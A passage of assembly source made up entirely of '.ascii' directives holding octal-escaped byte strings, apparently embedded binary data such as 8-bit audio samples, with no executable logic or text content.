"\012\026\034\377\005\034$\033\023\033\037&1&'*\016\371" .ascii "\333\330\344\346\331\333\340\341\001\366\344\367\006" .ascii "\005\025\011\004\007\353\342\315\323\321\340\000\362" .ascii "\017\037\025\036\021\020)(\033\022\024\010\366\350\334" .ascii "\356\357\376\004\366\007 \020\362\343\356\023\0341-" .ascii "9D2#\007\023\034\031\014\016\031)&),*OMO^WO7 \003\003" .ascii "\007\370\344\342\344\345\350\341\342\353\002\000\371" .ascii "\347\350\345\320\301\250\255\254\256\263\264\277\314" .ascii "\305\300\311\323\351\337\336\342\333\351\335\301\272" .ascii "\305\304\312\307\303\316\345\344\350\376\001\027\011" .ascii "\006\020\022\030\022\376\364\376\376\364\353\365\374" .ascii "\016\010\006\032'<;BMZ_M/('\030\034\003\375\014\004" .ascii "\365\356\366\010$\037\036 \034\003\345\343\357\356" .ascii "\367\357\361\003\006\372\363\372\006\027\011\000\005" .ascii "\007\373\356\331\327\344\334\341\317\333\356\355\350" .ascii "\344\354\376\024\010\010\013\015\010\372\346\347\370" .ascii "\363\373\363\002\024\025\016\017 ':1.<HI>-*" .ascii "6'\037\022\032\"\033\025\020\032-9,246,\023\377\363" .ascii "\354\327\325\323\355\007\011\014\017\035.8#$)#\024\005" .ascii "\365\367\010\371\374\374\014##\030\026\036#%\016\013" .ascii "\007\377\351\317\301\303\316\300\302\275\312\324\316" .ascii "\304\311\330\337\346\326\332\334\330\312\273\260\270" .ascii "\305\267\274\272\307\323\317\311\327\354\367\003\365" .ascii "\374\377\367\346\323\324\337\354\344\343\344\362\374" .ascii "\372\371\011\037*/\034\035\033\017\372\347\346\360\374" .ascii "\362\371\377\021\"$%9JNR:;7#\013\362\346\352\361\345" .ascii "\351\363\005\014\012\006\023'(,\036#(\033\004\365\360" .ascii "\367\376\354\353\356\370\370\361\361\001\027\031\034" .ascii "\013\017\017\376\352\332\335\343\351\334\336\345\361" .ascii "\364\356\357\000\026\026\026\014\021\022\006\364\353" .ascii "\360\367\374\354\357\366\000\004\006\022.GGF883\036" .ascii "\006\371\372\377\001\361\365\376\010\011\006\014\037" .ascii "1$\031\002\370\367\352\334\342\363\377\010\374\003\020" .ascii "\027\030\027 4KFEACE9**863\037\033\037\037\025\013\020" .ascii "\032+\036\024\013\011\003\355\332\326\336\332\330\305" .ascii "\303\314\314\307\304\317\341\362\347\344\340\340\334" .ascii "\310\271\267\302\300\277\262\266\304\306\303\300\317" .ascii "\337\357\345\340\335\333\330\303\266\271\310\310\311" .ascii "\276\303\321\316\312\311\324\345\365\351\350\354\355" .ascii "\355\341\332\346\375\374\375\366\372\010\005\377\376" .ascii "\013\026!\021\010\016\016\014\001\375\006\031\023\021" .ascii "\011\016\035\036\036$9ISHEHE=) $1($\035$1-(,>HO>8:4" .ascii "+\031\020\025 \024\014\004\007\024\015\011\021%/5' " .ascii "#\034\020\374\367\377\017\006\004\004\007\021\007\377" .ascii "\001\020\022\022\377\365\370\357\342\322\317\323\334" .ascii "\314\302\274\266\266\251\241\250\277\315\327\325\332" .ascii "\346\344\337\326\331\340\355\347\344\351\360\375\374" .ascii "\001\021+6<424&\032\013\007\010\013\375\364\362\363" .ascii "\372\362\364\377\021\025\030\017\014\021\005\372\357" .ascii "\357\363\373\355\352\357\361\370\365\371\006\031\032" .ascii "\036\026\022\027\016\003\374\377\377\004\365\357\361" .ascii "\361\365\360\363\374\016\020\023\016\014\021\005\372" .ascii "\361\362\360\360\342\334\335\335\342\340\346\363\007" .ascii "\011\014\011\011\013\377\365\354\355\352\351\330\322" .ascii "\320\316\322\316\326\346\372\374\002\000\377\002\366" .ascii "\360\353\357\362\367\354\353\360\360\364\363\371\006" .ascii "\025\021\024\020\014\020\006\376\374\377\375\377\361" .ascii "\357\362\360\362\363\372\006\030\026\032\027\023\024" .ascii "\011\001\377\005\004\007\376\001\005\005\011\012\023" .ascii "\036-+0/25+&#%\037\035\017\015\013\005\006\004\013\026" .ascii "\"\035 \032\024\017\375\361\351\344\334\336\324\331" .ascii "\341\345\357\367\005\025%#+,+-'$'-,2*.20005:@88.&\036" .ascii "\020\006\003\004\376\375\362\363\361\355\356\360\366" .ascii "\374\003\373\374\365\362\355\341\335\337\341\335\336" .ascii "\324\327\326\322\326\330\340\352\362\354\360\351\345" .ascii "\337\323\317\320\317\312\315\303\307\310\306\312\320" .ascii "\327\341\350\340\344\336\331\323\313\307\310\312\307" .ascii "\313\304\311\314\314\317\327\340\351\360\353\356\346" .ascii "\341\332\322\317\322\326\327\335\332\345\350\353\360" .ascii "\371\003\014\024\023\032\024\025\022\015\013\020\021" .ascii "\020\023\013\022\020\017\024\034\".405-*#\035\031\036" .ascii "\035\033\037\031\035\033\034\036%(374:54.*(,*()#(&)" .ascii ",5<EFAC71%\036\027\027\022\020\017\007\013\004\001\000" .ascii "\001\377\000\372\362\362\346\344\337\336\340\351\353" .ascii "\361\365\363\374\373\376\004\017\026#')/**&\"\037#\034" .ascii "\031\024\014\013\002\377\375\000\377\005\003\000\000" .ascii "\370\364\352\346\342\344\335\335\331\323\323\313\314" .ascii "\316\324\330\343\341\343\344\335\333\324\321\320\324" .ascii "\316\323\321\316\322\315\316\320\326\327\341\335\337" .ascii "\340\331\326\322\320\320\325\321\326\323\317\320\314" .ascii "\314\317\327\331\344\342\346\346\341\337\335\333\332" .ascii "\337\333\340\333\334\334\330\331\334\342\346\361\361" .ascii "\371\371\371\374\373\374\001\006\003\012\006\011\012" .ascii "\010\014\024\033\".+1/,($ #% (#$$!!&)-5162/*'$&%!%\036" .ascii "\037\035\036\037&+397=750.*-,+.'(# \035 %&\"%\034\026" .ascii "\020\013\003\004\374\365\362\344\340\327\323\322\332" .ascii "\335\350\357\362\372\370\371\370\372\367\000\001\005" .ascii "\012\011\017\017\023\027 #-..-% \027\020\011\011\000" .ascii "\376\371\363\360\353\352\353\357\360\372\367\370\367" .ascii "\360\353\344\335\331\332\322\326\323\320\320\317\317" .ascii "\323\331\333\347\345\350\350\344\340\335\332\327\331" .ascii "\323\326\321\315\315\314\313\317\327\332\345\344\351" .ascii "\350\343\337\333\326\323\325\320\325\320\320\317\316" .ascii "\317\325\332\337\350\346\353\347\343\340\335\330\330" .ascii "\331\324\331\324\326\330\332\336\352\362\373\010\012" .ascii "\022\021\017\015\014\007\012\014\011\017\015\017\017" .ascii "\021\023\032\037$-*.+)$\"\036\036\036\030\034\025\027" .ascii "\023\032\017$\033\0379&4\014\027\022\007\027$)\016G" .ascii "F.A4\027\023,LVCR/=G$\032##\366 \376\001\026\363\005" .ascii "\002\000\017\007\005\013\005\372\341\370\376\347\340" .ascii "\355\353\351\350\357\374\377\021'\037$9,#/3\024\021" .ascii "\030\034\027\031\027\0310\007\025%\024 \035\030\035" .ascii "\037\025\023\007\001\005\001\363\364\371\002\005\005" .ascii "\024\021\002\027\024\003\022\005\371\352\354\343\332" .ascii "\340\315\317\335\332\335\330\331\337\317\347\342\330" .ascii "\361\342\337\354\332\337\346\332\340\337\342\344\365" .ascii "\377\361\362\376\356\346\363\363\356\350\352\326\323" .ascii "\334\321\304\270\300\274\306\316\305\312\302\314\315" .ascii "\316\344\327\330\347\316\337\351\325\367\372\361\377" .ascii "\014\021\017\027\016\017\032\025\036\035\033\034\011" .ascii "\012\003\360\370\375\361\365\003\001\367\001\012\003" .ascii "\377\004\015\026\022\022\376\002\006\363\021\007\005" .ascii "\033\030\030&\033\030$\036\"#'\034\021\013\004\373\373" .ascii "\376\370\377\010\004\000\015\005\002\011\010\015\016" .ascii "\022\012\013\010\003\003\374\007\006\007\013\012\010" .ascii "\006\367\373\373\354\360\354\361\353\345\334\324\335" .ascii "\334\340\351\356\360\370\374\376\001\004\020\024 +," .ascii "+0* $#(*-02//%&* )\"\035\032\020\007\373\362\360\357" .ascii "\357\360\356\360\345\350\350\347\362\366\375\000\001" .ascii "\001\001\370\372\373\367\377\010\013\022\024\015\023" .ascii "\014\016\020\013\023\013\012\006\371\365\361\351\346" .ascii "\347\346\351\350\347\337\344\342\343\354\352\360\361" .ascii "\361\353\353\347\346\344\347\357\361\370\376\000\372" .ascii "\001\377\377\010\010\016\016\015\012\007\001\376\373" .ascii "\372\377\377\005\003\005\005\003\010\012\021\026\033" .ascii "\034\034\031\031\025\026\027\030\036!&#%## \036$ \037" .ascii "\030\015\012\377\371\371\363\364\364\366\362\370\366" .ascii "\363\371\371\000\005\011\014\014\010\007\002\001\004" .ascii "\004\014\015\020\021\024\017\016\015\010\011\006\007" .ascii "\000\371\355\345\327\320\314\303\302\273\274\270\271" .ascii "\267\271\277\300\312\323\331\340\347\344\351\352\356" .ascii "\367\374\007\016\027\033!\"&%$'%\"\037\031\014\006\373" .ascii "\367\363\354\357\354\352\350\350\344\343\347\345\352" .ascii "\356\356\357\356\346\350\344\337\346\347\355\363\367" .ascii "\367\374\372\372\375\372\376\375\375\371\367\355\350" .ascii "\342\333\335\331\332\331\333\331\331\331\334\337\342" .ascii "\353\356\362\362\364\356\356\353\347\356\356\364\370" .ascii "\372\372\374\370\370\371\366\372\371\366\362\357\345" .ascii "\341\334\326\332\327\335\342\344\345\354\355\362\374" .ascii "\000\011\017\025\026\031\026\027\030\026\037#*14584" .ascii "585985/+ \032\024\014\015\013\013\013\013\010\011\007" .ascii "\010\016\017\026\032\035\034\035\031\027\030\030\037" .ascii "\"(-//0..2/30-( \026\017\012\002\003\377\377\375\373" .ascii "\366\366\362\357\364\361\365\364\361\356\351\342\337" .ascii "\340\335\346\353\361\370\376\000\004\007\011\023\025" .ascii "\034 !\036\034\030\025\025\021\025\025\025\025\024\017" .ascii "\017\017\015\024\024\031\033\032\027\024\017\012\013" .ascii "\011\016\020\023\025\025\020\017\016\011\015\013\014" .ascii "\011\005\376\367\360\350\347\342\344\343\344\343\342" .ascii "\341\340" .ascii "\342\342\352\355\362\365\365\362\360\355\353\360\360" .ascii "\370\374\000\002\003\002\001\001\377\003\001\001\377" .ascii "\370\360\351\341\330\327\321\322\320\316\314\312\306" .ascii "\306\312\312\323\330\337\343\345\345\347\350\351\362" .ascii "\366\000\007\015\021\024\024\026\033\032!!\"!\035\030" .ascii "\022\015\007\010\003\004\004\003\000\377\375\374\000" .ascii "\377\006\011\012\013\012\006\004\003\001\006\006\013" .ascii "\016\017\020\021\020\017\023\022\027\025\025\024\017" .ascii "\010\004\000\372\373\367\370\366\364\362\361\360\360" .ascii "\365\364\373\375\376\377\374\367\366\364\357\364\362" .ascii "\363\363\361\355\353\347\344\346\341\343\341\336\333" .ascii "\330\324\322\321\316\324\324\330\333\336\341\345\352" .ascii "\357\371\376\007\014\020\022\023\021\021\023\021\026" .ascii "\025\030\031\030\027\026\025\024\027\024\026\022\016" .ascii "\012\004\375\370\364\355\356\347\346\343\337\336\335" .ascii "\335\337\345\346\355\356\357\357\357\354\356\357\356" .ascii "\365\365\367\371\372\372\374\374\375\002\377\003\001" .ascii "\376\373\371\363\360\357\352\354\347\346\344\342\337" .ascii "\337\340\340\346\345\351\350\347\345\343\340\337\341" .ascii "\340\345\344\350\351\352\354\360\364\367\377\000\007" .ascii "\007\011\012\011\007\011\011\007\013\011\012\012\012" .ascii "\012\016\020\024\034\034\"\"\"\"!\036 \037$!\"#\"!" .ascii "#\"#'#%\"\036\032\027\022\020\016\012\015\010\007\007" .ascii "\006\005\010\012\016\024\024\030\027\026\025\026\023" .ascii "\024\025\025\030\026\027\026\026\025\027\026\027\030" .ascii "\025\025\020\013\005\377\370\364\356\347\345\336\333" .ascii "\327\324\324\327\331\336\345\347\356\360\363\365\372" .ascii "\373\002\007\013\024\026\033\037#&,-1413/+'$\036\034" .ascii "\030\024\024\016\013\010\006\004\007\006\011\013\011" .ascii "\012\006\004\000\377\374\376\375\375\377\375\377\377" .ascii "\377\000\004\004\007\011\010\011\005\003\000\376\372" .ascii "\372\370\365\365\361\360\356\356\357\364\364\372\375" .ascii "\374\376\374\372\370\370\365\370\365\365\366\362\362" .ascii "\361\361\360\363\360\363\362\357\356\353\347\344\344" .ascii "\341\344\342\343\345\344\347\351\355\361\371\376\006" .ascii "\012\015\020\021\021\022\025\024\031\031\034\035\035" .ascii "\036\037 \"&%('%$\037\034\031\026\021\022\015\013\010" .ascii "\004\002\001\000\002\006\006\014\013\013\013\011\010" .ascii "\010\007\006\013\010\013\013\013\014\016\016\020\024" .ascii "\022\026\024\022\020\015\010\006\003\000\001\373\372" .ascii "\367\363\360\357\355\355\357\355\357\352\350\343\337" .ascii "\332\330\325\324\326\323\326\326\327\332\336\342\351" .ascii "\356\363\372\373\000\002\003\004\010\010\013\016\014" .ascii "\016\014\013\013\014\013\017\022\022\026\022\021\017" .ascii "\013\010\010\005\004\005\001\002\377\376\375\375\374" .ascii "\377\377\375\376\372\370\364\361\356\356\353\353\353" .ascii "\350\350\345\345\344\346\346\354\355\360\363\361\361" .ascii "\357\356\354\356\354\357\356\356\360\356\357\357\362" .ascii "\362\366\365\367\367\363\361\355\351\346\345\340\340" .ascii "\334\330\326\321\317\316\317\317\325\326\331\333\333" .ascii "\335\335\336\340\345\347\355\360\363\370\373\376\003" .ascii "\010\013\022\024\030\030\027\027\025\023\023\024\022" .ascii "\024\021\020\016\013\012\013\013\015\021\017\022\020" .ascii "\016\014\012\007\007\006\004\007\003\003\003\002\003" .ascii "\005\006\011\014\013\017\015\013\011\010\006\006\006" .ascii "\004\005\002\001\377\375\374\376\377\001\004\004\006" .ascii "\003\002\377\376\372\372\370\367\367\362\361\356\354" .ascii "\352\352\350\351\350\345\344\337\335\332\331\327\331" .ascii "\331\333\336\336\342\343\346\352\362\366\377\005\011" .ascii "\017\020\023\024\025\025\031\030\031\032\030\030\027" .ascii "\026\026\030\030\033\032\031\030\024\021\015\012\006" .ascii "\006\003\002\377\372\371\364\364\362\364\364\371\370" .ascii "\372\372\367\366\365\365\364\367\364\370\366\366\366" .ascii "\370\367\374\374\000\001\003\000\003\373\373\365\364" .ascii "\357\361\354\355\353\344\347\326\377\021\030\310\335" .ascii "\363\330\3738\020\015(\334\373 \027\366\356\374\031" .ascii "\016TJ1\37084\311\033\326\316\315\320\024\033\355\327" .ascii "\372\006\"TR=%\011\363\317\306\344\321\352\367\305\360" .ascii "\364\355\337\350\001\375\012\003\357\334\323\301\260" .ascii "\235\261\267\257\253\254\257\325\376\334\346\332\323" .ascii "\354\331\314\351\342\365\355\307\322\273\323\305\265" .ascii "\330\360\006\030\016\022>9CL\\B<<\037%&@-\026\032\033" .ascii "\012\006\027\0364J.\0344\032\035\014\006\034\030+\020" .ascii "\024$\016\0170\026\032+\005\027\022\362\365\004\350" .ascii "\327\365\347\344\361\341\350\356\002\357\343\360\002" .ascii "\005\357\353\364\370\351\363\330\346\002\374\377\344" .ascii "\352\020\016\022\017\033)\035/.FV@02!\"-\020\010\025" .ascii "+&$.'+\037\034\"\035%)\020\352\363\352\365\010\002\032" .ascii "%)650:\014\022\020\016\031\365\365\364\357\372\012\360" .ascii "\0141A2'0\027\026\374\354\320\312\343\333\274\324\321" .ascii "\305\315\305\306\315\342\311\321\321\332\355\340\321" .ascii "\312\325\346\313\316\317\301\337\321\315\353\373\364" .ascii "\376\346\364\005\015\005\347\365\007\026\000\004\024" .ascii "\016\011\002\360\002\036\031\0312?A=*\014\020\015\016" .ascii "\010\374\010\374\003\373\000\036ENV.EN.'\017\014\373" .ascii "\015\335\311\316\311\303\304\315\342\363\000\020\372" .ascii "\364\007\021\360\366\374\366\374\360\314\335\335\320" .ascii "\350\311\354\373\371\001\346\001\022\376\003\372\373" .ascii "\022\372\352\344\366\364\341\362\375\022++\036\026-" .ascii "1'6415,\027\032,&\031(\0341aSY]f^IL<@9\026\017\023\016" .ascii "\017\016\370\001\037(\034\035\017\007\021\367\352\351" .ascii "\360\373\357\333\351\363\354\353\360\343\000\014\364" .ascii "\376\373\372\010\375\360\010\016\027\001\367\006\002" .ascii "\374\355\344\350\364\362\366\336\330\350\354\345\337" .ascii "\364\355\336\324\300\305\264\314\306\270\321\341\364" .ascii "\335\355\361\366\003\354\337\364\360\363\341\311\333" .ascii "\343\353\350\346\366\007\005\015\003\015!\033\036\032" .ascii "\021\025\016\364\357\004\010\023\021\010\032\032\020" .ascii "\013\005\001\017\011\374\000\032\016\030\021\005'\037" .ascii "\032\030\020\030%\015\020\006\014\026\371\360\343\354" .ascii "\372\365\337\346\364\356\361\353\354\003\006\376\376" .ascii "\366\015\032\003\377\374\362\367\377\344\324\357\346" .ascii "\334\353\342\375\005\363\373\373\006\027\031\006\007" .ascii "\004\007\372\361\360\362\005\372\361\373\013\026\022" .ascii "\025\030 /$\034\024\037#\010\007\036&.6.*<G+582:%\034" .ascii "\037\034\032\012\371\006\016\023\372\354\367\361\371" .ascii "\364\362\374\032\036\022\015\010\020\017\021\011\012" .ascii "\021\030\023\013\021!-\"0;@L6/2\037\033\005\363\367" .ascii "\356\362\351\326\342\361\363\353\342\362\363\345\323" .ascii "\317\310\317\323\301\273\300\315\304\271\265\315\314" .ascii "\316\336\323\330\345\346\324\316\330\327\326\306\261" .ascii "\312\304\300\311\266\313\346\351\335\334\352\361\356" .ascii "\345\335\346\001\362\331\325\331\331\331\322\306\335" .ascii "\347\367\376\011\"(!\"#\035)#\012\364\005\006\362\371" .ascii "\356\001\023\017\026\027*3)%\037(5%\037\032\026+\"\025" .ascii "\"6:/66<B5*$(7)\022\030\025\021\015\021\012 (\034+%" .ascii "&-\037\010\017\024\024\002\362\364\360\372\364\363\374" .ascii "\002\021\021\005\013\030\030\023\017\026\037\032\016" .ascii "\374\370\352\354\341\325\342\354\363\342\345\352\355" .ascii "\372\344\332\350\324\322\300\251\257\252\261\254\256" .ascii "\307\337\343\344\343\366\011\005\006\013\021\015\022" .ascii "\010\377\004\010\025\015\03447<73-51\027\031\036\020" .ascii "\014\005\363\000\374\365\367\366\002\020\020\010\014" .ascii "\020\033\020\020\014\006\015\004\360\355\370\353\360" .ascii "\364\364\006\021\020\012\001\016\022\001\002\374\001" .ascii "\376\372\356\337\363\352\340\346\337\360\001\370\372" .ascii "\365\371\000\361\364\346\347\343\316\320\313\324\335" .ascii "\331\332\346\360\370\373\370\364\364\370\363\350\340" .ascii "\345\341\315\305\303\311\312\313\326\325\347\363\355" .ascii "\364\367\370\006\003\000\006\000\001\366\362\357\356" .ascii "\375\364\361\376\376\011\007\010\013\017\027\012\015" .ascii "\017\016\006\002\372\365\374\005\001\002\015\022\032" .ascii "\022\025\030\036$\027\033%\036 \031\013\013\014\030" .ascii "\031\031()6?5CD<5-+\"\034\022\007\007\010\006\014\012" .ascii "\016\021\021\013\005\001\376\372\352\354\355\347\362" .ascii "\356\347\371\365\004\015\005\025\032\035!$1302)1901" .ascii "41*&\"\026\030\030\017\012\010\017\015\010\001\377\372" .ascii "\365\363\345\340\353\333\333\336\325\345\345\336\342" .ascii "\342\345\351\334\341\330\332\340\323\330\325\317\317" .ascii "\315\307\311\323" .ascii "\320\316\327\330\335\334\333\325\317\325\322\312\313" .ascii "\316\315\310\313\315\312\325\323\317\322\316\321\331" .ascii "\321\321\325\320\326\327\330\335\337\341\331\327\340" .ascii "\335\340\340\342\342\345\353\344\345\355\357\357\356" .ascii "\367\373\366\001\001\006\013\024\030\026\037\030!% " .ascii "#$\035\"\037\032 \034\035\033\036\"&++&..+,-0'.'%)(" .ascii "# \"(*+10.-3,24-72,60/7-./)+$\"\033\031\030\020\024" .ascii "\020\013\003\374\371\363\353\351\341\332\335\336\335" .ascii "\334\350\350\347\357\364\365\371\376\373\370\377\000" .ascii "\002\011\004\023\027\022$ $*$#\035\031\030\014\005\374" .ascii "\361\365\356\351\353\361\357\350\350\351\351\342\340" .ascii "\336\334\327\337\327\321\322\320\317\313\322\313\326" .ascii "\327\317\332\323\324\334\325\324\332\331\332\323\315" .ascii "\315\314\313\313\317\324\326\326\327\326\326\332\336" .ascii "\332\333\340\341\343\334\335\327\323\321\316\323\322" .ascii "\332\330\331\342\343\345\357\350\353\362\351\364\351" .ascii "\342\346\340\337\342\347\352\361\362\370\370\377\006" .ascii "\011\016\020\026\027\034\031\022\025\027\025\030\034" .ascii "#'(-'(-0016+0(\")\037!%\"%,*+*).3//-+)!! !\034$%'+(" .ascii ")(1.1357/1*\037 \033\027\032\014\023\022\011\017\010" .ascii "\007\007\002\374\373\365\353\345\332\327\322\323\324" .ascii "\330\333\340\347\347\355\361\367\372\002\011\010\016" .ascii "\020\016\014\015\022\023\031\032\030\036\036\026\033" .ascii "\022\015\023\006\010\007\376\376\366\357\355\353\351" .ascii "\345\346\345\340\337\337\340\335\336\341\337\336\341" .ascii "\335\333\326\325\323\322\326\323\325\325\330\327\326" .ascii "\333\330\332\337\327\333\341\327\333\325\323\325\317" .ascii "\320\327\326\331\332\331\334\335\340\336\341\335\336" .ascii "\335\331\330\326\320\321\323\324\332\332\336\334\340" .ascii "\341\337\343\341\343\336\343\344\342\346\344\343\350" .ascii "\351\355\363\367\377\001\003\010\015\014\022\025\032" .ascii "\032 &#&%$!(%#&\037$\035&\032$\027$\020\031\372\027" .ascii "'\364\341\361\350\331\374\017#\3132\"\007\3566T\021" .ascii "c%\031\371\374\334\317\375\316\012\350\350\014\272\346" .ascii "\310\341\007\355\342\332\305\376\007'\037\330\016\007" .ascii "\010\335\007\024\350\341\007\370\344\376\005+\0161\033" .ascii "\336\035\024\320\337\037\"\375\003\024\001\006\014\342" .ascii "\002\342\346\335\301\322\305\260\203\276\266\270\301" .ascii "\323\321\365\035\000'RX0QW,-8\"0,6\033\015\012\372\336" .ascii "\331\013\351\323\315\340\340\341\323\373\336\002\020" .ascii "\344\017\021\023\337\371\023\006\015\013\011\375\012" .ascii "\017\001 \037\035\356\013\021\035\032\0077\030+$EEN" .ascii "1\0308=&\005\004\006\370\334\367\366\367\360\305\326" .ascii "\376\003\361\346\016\031\035\0161'+*\035 %M\364\012" .ascii "\020\014\017\015\022\373\001\375\021\020\023\371\325" .ascii "\320\351\363\347\345\345\352\315\306\341\312\341\314" .ascii "\303\326\337\360\330\346\367\365\353\0277F8>QGPM?1J" .ascii "$\014\031\014\016\351\333\365\357\000\371\347\355\362" .ascii "\363\351\356\366\362\306\335\355\367\361\343\352\300" .ascii "\337\357\350\342\337\305\250\303\307\310\262\274\311" .ascii "\325\375\374\027&8/\011+D*\031#06)$\015\374\361\330" .ascii "\330\316\335\266\250\263\272\343\300\363\377\350\357" .ascii "\010\014\017'\374\024\376\013\373\327\351\336\343\343" .ascii "\010\023\025\007\375\011 -\003\032'$9$>;**'!/>\017\010" .ascii "\002\016\365\362\003\355\355\353\367\005\031\352\350" .ascii "\371\361\356\363\357\357\371\340\356\003\006\025\007" .ascii "\005\023 3\036\023'0\373\0325-5ELQoYB*9%\005\004\374" .ascii "\357\316\314\322\321\344\332\336\342\354\357\335\312" .ascii "\337\315\241\276\331\371\357\370\372\376\005\375\001" .ascii "\377\004\351\333\344\002\363\374\377\374.+5KWKB4JT1" .ascii "-!\"\020\016\026\002\372\360\332\325\320\331\267\246" .ascii "\266\254\272\267\304\304\302\346\351\336\376\373\345" .ascii "\353\367\371\351\355\345\346\334\342\354\355\367\350" .ascii "\343\344\362\372\003\375\376\360\362\016\033(\025\030" .ascii "!&*!\007\355\355\342\324\332\333\340\323\332\335\353" .ascii "\370\376\372\341\375\374\356\346\342\326\307\323\310" .ascii "\336\333\342\327\325\366\366\373\367\012\366\374\013" .ascii "\036)146=JD,CE+\027\036\034$\005\372\004\026\031\034" .ascii "\020\010\025\002\010\020\036\006\367\011\031\030!\005" .ascii "\367\016\012\021\001\001\355\325\317\334\360\320\334" .ascii "\344\343\365\006\033\0378<<:LVKF92%.'*(\034\367\354" .ascii "\023\370\341\354\352\350\345\336\335\327\330\342\351" .ascii "\371\027\023\004\372\010\010\353\360\365\354\351\363" .ascii "\336\355\373\326\317\346\020\376\360\000\376\004\375" .ascii "\016\032 $\035\021\026/\"\017\003\373\364\355\364\374" .ascii "\375\370\361\004\011\004\002\374\005\366\363\371\372" .ascii "\373\365\350\357\375\000\003\371\350\347\353\341\334" .ascii "\314\320\306\300\314\337\335\344\322\305\337\325\346" .ascii "\340\350\325\321\315\306\316\305\277\276\314\315\342" .ascii "\341\330\346\355\350\373\020\036\024\031\"'6A7'$\024" .ascii "\375\372\034\363\330\335\332\353\371\021\003\006\022" .ascii "\020!\035+)\031\026\"'\035\037\017\015\022\027\013\015" .ascii "\010\365\343\331\351\344\314\312\330\331\357\356\370" .ascii "\007\024\032\0327=7,#++*1,$\030% --\027\003\015\024" .ascii "\021'\03452EVOPSA+87.\024\001\372\360\344\355\355\351" .ascii "\343\334\316\316\315\304\246\250\266\265\301\307\342" .ascii "\327\337\332\366\015\000\005\360\005\375\360\362\370" .ascii "\377\367\006\006\034//, &(#\033#\020\000\372\007\017" .ascii "\007\013\372\006\023\027\017\011\005\363\366\374\366" .ascii "\374\377\374\375\005\013\016\010\002\377\373\355\337" .ascii "\350\325\312\272\306\305\312\317\313\326\327\340\320" .ascii "\332\340\344\320\316\336\340\333\343\352\347\357\357" .ascii "\352\346\347\323\302\274\305\277\275\304\315\326\352" .ascii "\376\012\025 #\030%.\035\023\025\036\005\013\017\011" .ascii "\020\006\013\023\030\016\007\372\001\374\011\373\017" .ascii "\036\0170*1:D5'+,$\023\024\012\001\003\003\003\001\005" .ascii "\361\355\371\004\367\351\000\355\347\352\003\015\005" .ascii "\013\006\037\032 \034\027\025\021\017\377\023\011\004" .ascii "\012\026!-:22:9+\"0$\025\034\033\032\024!\037!\"\035" .ascii "\031\012\006\375\353\347\341\332\341\341\350\352\357" .ascii "\367\373\374\372\365\352\353\360\353\344\343\357\357" .ascii "\373\002\012\017\032\037\017\020\031\036\001\005\014" .ascii "\013\014\006\365\371\001\001\356\353\356\330\321\301" .ascii "\323\313\307\310\315\327\346\357\357\370\003\375\362" .ascii "\000\002\003\367\002\002\003\013\016\012\007\021\001" .ascii "\365\367\363\351\341\330\344\335\340\367\362\377\016" .ascii "\001\011\024\027\020\000\010\001\370\351\352\345\340" .ascii "\337\333\336\340\342\327\324\330\336\317\314\327\327" .ascii "\322\327\327\345\353\354\346\342\357\347\336\345\360" .ascii "\350\351\343\360\350\362\366\370\010\005\026\016\007" .ascii "\005\016\375\011\021\012\022\022\037\"220/71$$$\036" .ascii "\030\036%,+.53<B,6.$\035\033\033\030\025\021!\032.\"" .ascii "$+,&\035)&%\032(#)&\"\034\027\025\006\372\362\365\336" .ascii "\324\326\326\320\314\320\322\322\315\310\306\316\323" .ascii "\306\306\323\333\333\336\340\360\367\373\012\000\021" .ascii "\014\375\374\372\376\365\366\001\012\015\025\")152." .ascii "31\036\031\032\032\012\012\013\012\014\014\012\005\014" .ascii "\003\366\352\373\366\346\342\353\353\350\362\366\003" .ascii "\377\011\015\002\014\377\370\366\364\366\342\351\352" .ascii "\352\351\352\347\344\354\345\330\321\327\317\307\315" .ascii "\324\327\330\336\336\341\355\347\340\331\340\331\314" .ascii "\316\314\316\324\321\332\340\344\365\360\360\356\356" .ascii "\340\337\345\323\315\330\335\340\341\354\370\001\017" .ascii "\016\014\023\034\024\021\025\036\033\034&*249388+!%" .ascii ")\030\027\026\"\030\") 0..-1-'\035$%#\"+0'1%\036$\033" .ascii "\014\005\004\000\365\371\375\001\004\016\024\031%'!" .ascii "\032!\027\012\001\004\376\373\372\366\375\366\363\354" .ascii "\356\353\330\313\301\307\276\263\260\257\264\276\317" .ascii "\326\336\357\355\354\365\000\001\372\377\004\006" .ascii "\005\024\031\033#+%'/!\031\027\031\017\012\014\024\023" .ascii "\026\034\031 \035\031\014\014\016\002\377\376\005\372" .ascii "\376\376\375\005\012\014\373\007\377\361\352\352\360" .ascii "\347\333\345\363\356\374\364\367\373\000\367\354\367" .ascii "\360\354\337\353\355\347\360\357\362\365\372\366\356" .ascii "\361\354\336\322\325\322\310\307\313\320\317\327\325" .ascii "\331\334\343\341\331\344\340\331\326\333\342\334\344" .ascii "\353\355\361\351\345\350\355\347\336\332\354\343\337" .ascii "\351\365\377\000\016\021 !&\034$+\037\033\033&$)).." .ascii "..#$( \021\006#\000\374\367\361\035\032,\020260A,TI" .ascii "+67'\"\024\371\001!\023\011%+\037#\024A(*3\3632\015" .ascii "\017\013\360\361\333\340\363\000\344\356\367\375\371" .ascii "\006\373\363\361\000\353\300\311\314\304\243\254\276" .ascii "\274\330\353\361\352\005\032\027\036\035,\020\032\374" .ascii "\373\014\376\013\364\352\022\"\014+\374\016)\014\013" .ascii "\364\002\370\336\331\341\336\345\356\337\341\370\376" .ascii "\335\342\354\374\375\375\022\003\027\030\010\356\356" .ascii "\015\361\343\336\311\347\342\316\337\342\374\015\014" .ascii "\006\022\026\032\020\367\367\002\012\356\355\354\367" .ascii "\370\376\007\004 \036\017\002\002\002\363\316\310\323" .ascii "\323\331\321\326\326\364\357\344\374\000\021\015\000" .ascii "\013\014\006\037\377\357\006\001\004\362\366\364\366" .ascii "\000\370\371\010\036\037\030\024\036$!\023\002\012\030" .ascii "\025\376\365\001\021\004\376\011\035-, \034*\037\027" .ascii "\376\366\001\352\341\350\334\355\374\366\377\011%('" .ascii "$\023\030\033\021\007\003\014\024\010\000\013\015\033" .ascii "\032\005\010\024!\024\375\007\021\013\010\364\364\373" .ascii "\371\353\335\325\350\360\327\337\346\361\375\373\365" .ascii "\373\011\013\376\373\373\375\373\355\344\337\360\001" .ascii "\374\001\0251?E@8HF<\"\033#\036\007\375\005\022\037" .ascii "\024\027\022\",\017\001\005\013\373\343\336\334\341" .ascii "\341\322\312\336\361\361\360\363\373\000\006\006\375" .ascii "\373\013\003\362\353\355\363\345\330\310\310\324\334" .ascii "\316\310\330\355\366\350\357\370\375\004\354\335\343" .ascii "\356\333\306\302\315\335\335\335\335\361\373\377\360" .ascii 